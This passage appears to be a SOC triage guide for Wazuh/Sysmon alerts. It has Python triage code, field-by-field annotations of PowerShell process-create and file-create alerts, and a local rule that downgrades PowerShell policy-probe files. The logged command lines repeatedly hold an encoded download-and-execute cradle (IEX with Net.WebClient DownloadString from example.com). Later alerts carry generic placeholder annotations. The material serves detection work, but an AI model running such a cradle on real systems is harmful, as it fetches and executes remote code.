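    return {"download_cradle": hits["invoke"] and (hits["client"] or hits["download"]),
            "url": m.group(0) if m else None, "indicators": hits}

def process_chain(alerts, leaf_guid):
    """PIDs from the oldest known ancestor down to leaf_guid, linked by ProcessGuid
    (PIDs recycle, GUIDs do not); a parent with no EID 1 in the window is still listed."""
    by_guid = {a["processGuid"]: a for a in alerts if a["eventID"] == "1"}
    chain, guid = [], leaf_guid
    while guid in by_guid:
        node = by_guid[guid]
        chain.append(node["processId"])
        guid = node["parentProcessGuid"]
        if guid not in by_guid:
            chain.append(node["parentProcessId"])
    return chain[::-1]

# powershell.exe writes __PSScriptPolicyTest_<random>.<random>.ps1 to %TEMP% at
# every start-up to test whether AppLocker/WDAC enforces script rules.
POLICY_PROBE = re.compile(r"\\__PSScriptPolicyTest_[a-z0-9]+\.[a-z0-9]+\.ps1$", re.I)

def triage_file_create(alert, alerts):
    """Probe file written by powershell.exe = side effect of the matching EID 1 launch."""
    creator = next((a for a in alerts if a["eventID"] == "1"
                    and a["processGuid"] == alert["processGuid"]), None)
    is_probe = (POLICY_PROBE.search(alert["targetFilename"]) is not None
                and alert["image"].lower().endswith("\\powershell.exe"))
    return {"verdict": "powershell-policy-probe" if is_probe else "review",
            "creator_pid": creator["processId"] if creator else None}

def triage(alerts):
    """Run the three checks over one alert window and return a single summary."""
    creates = [a for a in alerts if a["eventID"] == "1"]
    scripts = sorted({s for s in map(decode_encoded_command, (a["commandLine"] for a in creates)) if s})
    leaf = max(creates, key=lambda a: a["utcTime"])
    return {"decoded": scripts,
            "cradle": [classify_cradle(s) for s in scripts],
            "chain": process_chain(alerts, leaf["processGuid"]),
            "file_creates": {a["targetFilename"].rsplit("\\", 1)[-1]: triage_file_create(a, alerts)
                             for a in alerts if a["eventID"] == "11"}}

if __name__ == "__main__":
    print(triage(ALERTS))
```

Run against the alerts above, triage(ALERTS) yields one decoded command, a download-cradle verdict with the URL https://example.com/test, the chain 15624 → 15800 → 15900 → 16016 (the first PID has no EID 1 in the excerpt), and both .ps1 creates classified as PowerShell's own policy probe, linked back to PIDs 15800 and 15900. The blocking decision therefore rests on the EID 1 / 92057 alerts; the 92213 hits corroborate the launches but do not indicate a second dropper.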
rule.description: Executable file dropped in folder commonly used by malware Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline, not a verdict: here the "executable" is a PowerShell .ps1 in the user's Temp folder, so check data.win.eventdata.targetFilename before acting.
rule.id: 92213 Numeric ID of the detection rule that fired.
rule.mitre.id: ['T1105'] List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.
rule.mitre.tactic: ['Command and Control'] ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.
rule.mitre.technique: ['Ingress Tool Transfer'] Specific technique name (e.g., PowerShell). Shows the HOW.
rule.firedtimes: 73 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: True True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['sysmon', 'sysmon_eid11_detections', 'windows'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745534304.1615008 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-Sysmon ETW provider that wrote the event. Microsoft-Windows-Sysmon means Sysmon telemetry, so field meanings follow the Sysmon schema, not the Security log.
data.win.system.providerGuid: {5770385f-c22a-43e0-bf4c-06f5698ffbd9} GUID of the Sysmon ETW provider; stable across installs, so filter on it if the provider name is ever rewritten.
data.win.system.eventID: 11 Sysmon event ID, not a Security-log ID: 11 = FileCreate (1 = Process Create, 3 = Network connection). Check the channel before applying 4624/4688-style lookups.
data.win.system.version: 2 Schema version of this event type; Sysmon bumps it when fields are added or renamed, so parsers should key on it.
data.win.system.level: 4 Numeric severity: 4 = Information. Sysmon logs almost everything at level 4, so never triage by this field.
data.win.system.task: 11 Task category; in Sysmon it mirrors the event ID.
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x8000000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-24T22:38:22.5603577Z Time the record was written to the Event Log (UTC). It trails data.win.eventdata.utcTime (22:38:22.512) by under a tenth of a second; use utcTime in timelines.
data.win.system.eventRecordID: 284547 Incremental log record number – handy for timeline order.
data.win.system.processID: 3712 PID of the Sysmon service process that wrote the record (3712 in every alert here), not of the process under investigation; that one is data.win.eventdata.processId.
data.win.system.threadID: 4740 Thread of the Sysmon service that wrote the record; same caveat as processID.
data.win.system.channel: Microsoft-Windows-Sysmon/Operational Event Log channel the record came from; confirms Sysmon telemetry and is the channel the Wazuh agent must subscribe to.
data.win.system.computer: Attacker Hostname recorded by Windows; should match agent.name. A mismatch means forwarded or relabelled events.
data.win.system.severityValue: INFORMATION TEXT severity (INFO, WARNING, ERROR).
data.win.system.message: "File created:
RuleName: -
UtcTime: 2025-04-24 22:38:22.512
ProcessGuid: {94294ddc-bd5c-680a-720b-000000000e00}
ProcessId: 15900
Image: C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe
TargetFilename: C:\Users\Attcker1\AppData\Local\Temp\__PSScriptPolicyTest_uba1xjco.x5u.ps1
CreationUtcTime: 2025-04-24 22:38:22.512
User: Attacker\Attcker1" Sysmon's rendered message text (File created); the same fields are parsed one by one under data.win.eventdata below.
data.win.eventdata.utcTime: 2025-04-24 22:38:22.512 UTC time Sysmon recorded the file creation; about two seconds after the creating process started in the EID 1 above (22:38:20.548).
data.win.eventdata.processGuid: {94294ddc-bd5c-680a-720b-000000000e00} GUID of the process that created the file. It equals the processGuid of the EID 1 above (PID 15900), so this file came from the encoded-command PowerShell, not from a separate dropper.
data.win.eventdata.processId: 15900 PID of the creating process; consistent with the GUID link, but PIDs recycle, so trust the GUID.
data.win.eventdata.image: C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe Executable that wrote the file: PowerShell itself.
data.win.eventdata.targetFilename: C:\\Users\\Attcker1\\AppData\\Local\\Temp\\__PSScriptPolicyTest_uba1xjco.x5u.ps1 Path of the created file. __PSScriptPolicyTest_<random>.<random>.ps1 in %TEMP% is written by every powershell.exe start-up to test whether AppLocker/WDAC enforces script rules; it is a side effect of the launch in the matching EID 1, not a payload. Rule 92213 fires on a .ps1 in a Temp folder regardless, so the actionable signal in this pair is the EID 1 / rule 92057.
data.win.eventdata.creationUtcTime: 2025-04-24 22:38:22.512 Creation timestamp of the file itself. Equal to utcTime here; if it were earlier than utcTime the timestamp was backdated (timestomping, which Sysmon also reports as EID 2).
data.win.eventdata.user: Attacker\\Attcker1 Account that created the file; the same local user as the process chain.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
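A practical follow-up to the repeated 92213 hits above is a Wazuh child rule that lowers the level of exactly this probe-file pattern while leaving every other 92213 match, and the EID 1 rule 92057, untouched. This fragment is an added example, not part of the stock Wazuh ruleset; the rule ID 100213 (from the 100000-120000 range reserved for local rules) and level 3 are assumptions. It goes in /var/ossec/etc/rules/local_rules.xml on the manager and takes effect after a manager restart.

```xml
<!-- Added example for local_rules.xml (not a stock Wazuh rule). Child of 92213:
     both <field> conditions must match, so only PowerShell's own
     __PSScriptPolicyTest_<random>.<random>.ps1 probe written by powershell.exe
     is downgraded; any other file 92213 catches keeps its original level. -->
<group name="sysmon,sysmon_eid11_detections,windows,">
  <rule id="100213" level="3">
    <if_sid>92213</if_sid>
    <field name="win.eventdata.image" type="pcre2">(?i)\\powershell\.exe$</field>
    <field name="win.eventdata.targetFilename" type="pcre2">(?i)\\__PSScriptPolicyTest_[a-z0-9]+\.[a-z0-9]+\.ps1$</field>
    <description>PowerShell AppLocker/WDAC script-policy probe file in Temp (start-up side effect; see the matching Sysmon EID 1)</description>
    <mitre>
      <id>T1059.001</id>
    </mitre>
  </rule>
</group>
```

At level 3 the event is still recorded (the default log_alert_level is 3) but no longer mailed or shown as a headline, and the pivot to the launching process via processGuid remains available. The regex is anchored on the filename tail, so a payload merely named to resemble the probe but written by a different image still lands on the parent rule.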
rule.description: Powershell.exe spawned a powershell process which executed a base64 encoded command Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 92057 Numeric ID of the detection rule that fired.
rule.mitre.id: ['T1059.001'] List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.
rule.mitre.tactic: ['Execution'] ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.
rule.mitre.technique: ['PowerShell'] Specific technique name (e.g., PowerShell). Shows the HOW.
rule.firedtimes: 70 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: True True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['sysmon', 'sysmon_eid1_detections', 'windows'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745534307.1617777 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-Sysmon ETW provider that wrote the event. Microsoft-Windows-Sysmon means Sysmon telemetry, so field meanings follow the Sysmon schema, not the Security log.
data.win.system.providerGuid: {5770385f-c22a-43e0-bf4c-06f5698ffbd9} GUID of the Sysmon ETW provider; stable across installs, so filter on it if the provider name is ever rewritten.
data.win.system.eventID: 1 Sysmon event ID, not a Security-log ID: 1 = Process Create (11 = FileCreate, 3 = Network connection). Check the channel before applying 4624/4688-style lookups.
data.win.system.version: 5 Schema version of this event type; Sysmon bumps it when fields are added or renamed, so parsers should key on it.
data.win.system.level: 4 Numeric severity: 4 = Information. Sysmon logs almost everything at level 4, so never triage by this field.
data.win.system.task: 1 Task category; in Sysmon it mirrors the event ID.
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x8000000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-24T22:38:25.2469858Z Time the record was written to the Event Log (UTC). It lands about a second and a half after data.win.eventdata.utcTime (22:38:23.806), a normal lag for Sysmon EID 1; use utcTime in timelines.
data.win.system.eventRecordID: 284576 Incremental log record number – handy for timeline order.
data.win.system.processID: 3712 PID of the Sysmon service process that wrote the record (3712 in every alert here), not of the process under investigation; that one is data.win.eventdata.processId.
data.win.system.threadID: 4740 Thread of the Sysmon service that wrote the record; same caveat as processID.
data.win.system.channel: Microsoft-Windows-Sysmon/Operational Event Log channel the record came from; confirms Sysmon telemetry and is the channel the Wazuh agent must subscribe to.
data.win.system.computer: Attacker Hostname recorded by Windows; should match agent.name. A mismatch means forwarded or relabelled events.
data.win.system.severityValue: INFORMATION TEXT severity (INFO, WARNING, ERROR).
data.win.system.message: "Process Create:
RuleName: -
UtcTime: 2025-04-24 22:38:23.806
ProcessGuid: {94294ddc-bd5f-680a-740b-000000000e00}
ProcessId: 16016
Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
FileVersion: 10.0.26100.3323 (WinBuild.160101.0800)
Description: Windows PowerShell
Product: Microsoft® Windows® Operating System
Company: Microsoft Corporation
OriginalFileName: PowerShell.EXE
CommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
CurrentDirectory: C:\Users\Attcker1\
User: Attacker\Attcker1
LogonGuid: {94294ddc-ea85-67fe-8465-020000000000}
LogonId: 0x26584
TerminalSessionId: 1
IntegrityLevel: Medium
Hashes: SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC
ParentProcessGuid: {94294ddc-bd5c-680a-720b-000000000e00}
ParentProcessId: 15900
ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
ParentCommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
ParentUser: Attacker\Attcker1" Sysmon's rendered message text (Process Create); the same fields are parsed one by one under data.win.eventdata below.
data.win.eventdata.utcTime: 2025-04-24 22:38:23.806 UTC time Sysmon recorded for the process start itself; the timestamp to use in timelines (data.win.system.systemTime is only when the record was written).
data.win.eventdata.processGuid: {94294ddc-bd5f-680a-740b-000000000e00} Sysmon's unique identifier for this process. PIDs are reused, GUIDs are not, so pivot on this to tie EID 1, EID 11 and other Sysmon events to one process.
data.win.eventdata.processId: 16016 PID of the new process. Windows recycles PIDs, so use it only together with processGuid.
data.win.eventdata.image: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe Full path of the executable that was started. The doubled backslashes are JSON escaping in the Wazuh alert, not part of the path.
data.win.eventdata.fileVersion: 10.0.26100.3323 (WinBuild.160101.0800) File version from the binary's version resource; 10.0.26100 is the Windows 11 24H2 build line.
data.win.eventdata.description: Windows PowerShell Description string from the version resource.
data.win.eventdata.product: Microsoft® Windows® Operating System Product name from the version resource.
data.win.eventdata.company: Microsoft Corporation Company name from the version resource. Trivially forged, so never treat it as proof of a signed Microsoft binary; check the hash or signature instead.
data.win.eventdata.originalFileName: PowerShell.EXE Internal name compiled into the binary. It survives a rename on disk, so PowerShell.EXE under a different image name is a classic masquerading tell.
data.win.eventdata.commandLine: \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA Full command line of the new process. -NoProfile skips profile scripts; -EncodedCommand takes base64 of UTF-16LE, which is why the blob is full of "A". Decoded it reads IEX(New-Object Net.WebClient).DownloadString('https://example.com/test'), a download-and-execute cradle. The \" and \\ are JSON escaping.
data.win.eventdata.currentDirectory: C:\\Users\\Attcker1\\ Working directory of the new process; the user's profile root is typical of a shell started from an interactive session.
data.win.eventdata.user: Attacker\\Attcker1 Account (DOMAIN\user) the process runs as. The domain part equals the hostname (Attacker), so this is a local account.
data.win.eventdata.logonGuid: {94294ddc-ea85-67fe-8465-020000000000} Sysmon's identifier for the logon session; constant across every process in this chain, so all of it happened in one session.
data.win.eventdata.logonId: 0x26584 Windows logon session ID. It matches the Logon ID in Security event 4624, so use it to find how and when this session authenticated.
data.win.eventdata.terminalSessionId: 1 Windows session number: 0 is services, 1 or higher is an interactive console or RDP session.
data.win.eventdata.integrityLevel: Medium Mandatory integrity level of the process token. Medium = standard, unelevated user; High would mean an elevated (administrator) token.
data.win.eventdata.hashes: SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC Hash(es) of the image file, algorithms as configured in Sysmon. Identical to the parent's, so both are the same on-disk powershell.exe; compare against a known-good baseline rather than a threat feed.
data.win.eventdata.parentProcessGuid: {94294ddc-bd5c-680a-720b-000000000e00} Sysmon GUID of the parent. It is the processGuid of the EID 1 alert earlier on this page (PID 15900), so this is the third generation of the chain.
data.win.eventdata.parentProcessId: 15900 PID of the parent; consistent with the GUID link above.
data.win.eventdata.parentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe Executable of the parent. powershell.exe spawning powershell.exe is what rule 92057 keys on.
data.win.eventdata.parentCommandLine: \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA Parent's command line, identical to the child's: each generation re-launches the same encoded command, which is why rules 92057 and 92213 keep firing in pairs.
data.win.eventdata.parentUser: Attacker\\Attcker1 Account the parent ran as; same user, so no privilege change between parent and child.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
rule.description: Executable file dropped in folder commonly used by malware Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline, not a verdict: in this chain the "executable" has been a PowerShell .ps1 in the user's Temp folder each time, so check data.win.eventdata.targetFilename before acting.
rule.id: 92213 Numeric ID of the detection rule that fired.
rule.mitre.id: ['T1105'] List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.
rule.mitre.tactic: ['Command and Control'] ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.
rule.mitre.technique: ['Ingress Tool Transfer'] Specific technique name (e.g., PowerShell). Shows the HOW.
rule.firedtimes: 74 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: True True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['sysmon', 'sysmon_eid11_detections', 'windows'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745534307.1625848 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-Sysmon No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.providerGuid: {5770385f-c22a-43e0-bf4c-06f5698ffbd9} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventID: 11 Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!
data.win.system.version: 2 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.level: 4 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.task: 11 Windows task category (Logon, Policy Change, etc.).
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x8000000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-24T22:38:25.4788727Z No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventRecordID: 284577 Incremental log record number – handy for timeline order.
data.win.system.processID: 3712 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.threadID: 4740 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.channel: Microsoft-Windows-Sysmon/Operational No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.computer: Attacker No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.severityValue: INFORMATION TEXT severity (INFO, WARNING, ERROR).
data.win.system.message: "File created:
RuleName: -
UtcTime: 2025-04-24 22:38:25.438
ProcessGuid: {94294ddc-bd5f-680a-740b-000000000e00}
ProcessId: 16016
Image: C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe
TargetFilename: C:\Users\Attcker1\AppData\Local\Temp\__PSScriptPolicyTest_tvke0fdg.nch.ps1
CreationUtcTime: 2025-04-24 22:38:25.438
User: Attacker\Attcker1" No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.utcTime: 2025-04-24 22:38:25.438 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processGuid: {94294ddc-bd5f-680a-740b-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processId: 16016 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.image: C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetFilename: C:\\Users\\Attcker1\\AppData\\Local\\Temp\\__PSScriptPolicyTest_tvke0fdg.nch.ps1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.creationUtcTime: 2025-04-24 22:38:25.438 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.user: Attacker\\Attcker1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
rule.description: Powershell.exe spawned a powershell process which executed a base64 encoded command Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 92057 Numeric ID of the detection rule that fired.
rule.mitre.id: ['T1059.001'] List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.
rule.mitre.tactic: ['Execution'] ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.
rule.mitre.technique: ['PowerShell'] Specific technique name (e.g., PowerShell). Shows the HOW.
rule.firedtimes: 71 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: True True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['sysmon', 'sysmon_eid1_detections', 'windows'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745534310.1628617 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-Sysmon No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.providerGuid: {5770385f-c22a-43e0-bf4c-06f5698ffbd9} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventID: 1 Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!
data.win.system.version: 5 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.level: 4 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.task: 1 Windows task category (Logon, Policy Change, etc.).
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x8000000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-24T22:38:27.9090694Z No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventRecordID: 284623 Incremental log record number – handy for timeline order.
data.win.system.processID: 3712 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.threadID: 4740 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.channel: Microsoft-Windows-Sysmon/Operational No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.computer: Attacker No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.severityValue: INFORMATION TEXT severity (INFO, WARNING, ERROR).
data.win.system.message: "Process Create:
RuleName: -
UtcTime: 2025-04-24 22:38:26.606
ProcessGuid: {94294ddc-bd62-680a-760b-000000000e00}
ProcessId: 16188
Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
FileVersion: 10.0.26100.3323 (WinBuild.160101.0800)
Description: Windows PowerShell
Product: Microsoft® Windows® Operating System
Company: Microsoft Corporation
OriginalFileName: PowerShell.EXE
CommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
CurrentDirectory: C:\Users\Attcker1\
User: Attacker\Attcker1
LogonGuid: {94294ddc-ea85-67fe-8465-020000000000}
LogonId: 0x26584
TerminalSessionId: 1
IntegrityLevel: Medium
Hashes: SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC
ParentProcessGuid: {94294ddc-bd5f-680a-740b-000000000e00}
ParentProcessId: 16016
ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
ParentCommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
ParentUser: Attacker\Attcker1" No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.utcTime: 2025-04-24 22:38:26.606 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processGuid: {94294ddc-bd62-680a-760b-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processId: 16188 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.image: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.fileVersion: 10.0.26100.3323 (WinBuild.160101.0800) No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.description: Windows PowerShell No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.product: Microsoft® Windows® Operating System No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.company: Microsoft Corporation No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.originalFileName: PowerShell.EXE No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.commandLine: \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.currentDirectory: C:\\Users\\Attcker1\\ No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.user: Attacker\\Attcker1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonGuid: {94294ddc-ea85-67fe-8465-020000000000} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonId: 0x26584 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.terminalSessionId: 1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.integrityLevel: Medium No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
